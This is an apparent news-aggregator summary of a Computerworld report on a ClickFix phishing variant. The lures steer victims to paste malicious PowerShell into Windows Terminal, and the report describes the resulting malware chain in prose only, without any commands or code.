"Rather than asking potential victims to copy and paste a (malicious) command into the Run dialog, launched by hitting the Windows button plus the letter R, they are being told to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly. Once the terminal is opened, victims are prompted to paste in malicious PowerShell commands delivered through fake CAPTCHA pages, troubleshooting prompts, or verification-style lures designed to appear routine and benign."
"Going this route evades defenses looking for unusual run commands, and it bypasses security awareness training that tells employees not to do anything that invokes the Run command. The decoded PowerShell script then downloads a legitimate but renamed 7-Zip binary and saves it with a randomized file name, along with a zipped payload. The renamed archive utility extracts and runs the malware, which executes a multi-stage attack chain."
Threat actors are evolving ClickFix phishing tactics by directing victims to use Windows Terminal instead of the Run dialog to execute malicious commands. This approach circumvents security defenses designed to detect suspicious Run command activity and bypasses employee training warning against such actions. Once Windows Terminal opens, victims paste malicious PowerShell commands from fake CAPTCHA pages or troubleshooting prompts. The attack chains include multiple stages: decoding hex commands, downloading renamed legitimate utilities like 7-Zip, extracting malware payloads, establishing persistence through scheduled tasks, evading Microsoft Defender, and exfiltrating sensitive data. Alternative attack paths use hex-encoded, XOR-compressed commands to download batch files. Security leaders must educate employees about this emerging tactic.
#clickfix-phishing #windows-terminal-exploitation #malware-delivery #powershell-attacks #security-awareness-training
Read at Computerworld
Unable to calculate read time
Collection
[
|
...
]